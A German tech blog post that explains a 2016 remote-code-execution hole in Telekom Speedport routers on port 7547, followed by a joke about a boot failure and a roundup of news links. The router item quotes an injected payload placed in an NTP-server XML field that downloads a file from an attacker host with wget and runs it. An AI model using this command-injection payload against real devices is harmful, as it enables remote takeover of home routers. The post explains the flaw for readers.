Speedportrouter der DTAG von Sicherheitsloch betroffen

Jetzt ist es endlich final, die DSL-Speedportrouter der Deutschen Telekom haben ein Sicherheitsloch auf Port 7547 :

https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759

und ein echt dreckiges dazu, weil die Kisten a) auf jeden Zugriff reagieren und b) eine Remote-Execution möglich ist. Der Hack funktioniert so:

<NewNTPServer1>
`cd /tmp;wget http://angreiferszum nachladen von code/1>;chmod 777 1;./1`
</NewNTPServer1>
<NewNTPServer2></NewNTPServer2>
<NewNTPServer3></NewNTPServer3>
<NewNTPServer4></NewNTPServer4>
<NewNTPServer5></NewNTPServer5>

Natürlich gehört zu dem Request noch mehr, aber das sind die Grundlagen und aus dem Kontext kann man ersehen, daß hier einfach ein parameter aus dem Web genommen wird und an die Bash weitergereicht wird ohne den Inhalt auf Konsistenz zu prüfen. Ein einfacher Test, ob da ein Domainname/IP drinsteht, hätte das bundesweite Chaos vom Wochenende verhindert.

Die DSL-Router wurden Ihnen „proudly presented by Zyxel“ !!! Amis 😉

 

Der erste Advents Nicht-Boot

Wenn Ihr Rechner beim Booten laufend nach dem Festplattenentschlüsselungspasswort fragt, aber das Kryptolaufwerk einfach nicht starten will, könnte es sein, daß es das tatsächlich schlicht nicht kann, weil es nicht da ist.

Was zunächst wie eine Sträter Geschichte, so gegen Mittag, kurz vorm Frühstück, anfängt, löste sich zum Glück schnell wieder auf. Hier eine Kurzzusammenfassung:

Wenn das Stromkabel nicht in der Platte steckt,
der Rechner beim Booten schlicht verreckt,
und kommt der wackre Linuxmann,
blitzesschnelle an die Hardware ran,
im Handumdrehen ist dann geschehen,
die Platte scheint doch noch zugehen.

EIne frohe und fehlerfreie Adventszeit.

Diese Woche im Netz

Ebola kann auch nur übertragen werden, ohne daran zu sterben oder zu leiden.

Quelle: Spectrum

MEGA ( der Storageanbieter formely known as Komm-ich-in-die-USA,-bleib-ich-für-immer-da ) wurde jetzt Opfer eines Hacks. Die Angreifer haben sich den Sourcecode diverser Projekte gegriffen.

Quelle: TorrentFreak

Aus Zeitmangel hat sich der zukünftige US-Präsident D.T. mit einem Vergleich aus einem Prozess um seine „Trump University“ zurückgezogen. Die Uni sollte erfolgreiche Geschäftsleute hervorbringen, was woll nicht ganz geklappt hat. Aber lest es selbst.

Quelle: Tagesspiegel

Neues aus der Redox-Fux-Batterie Ecke. Die Idee aus den 70er Jahren wird immer interessanter, weil es immer mehr Werkstoffe gibt, welche die nötigen Eigenschaften haben.

Quelle: Golem

Auf Millionen China Smartphones sind RootKitartige Tools vorinstalliert, die alle Daten des Besitzers übermitteln können.

Quelle: TheHackerNews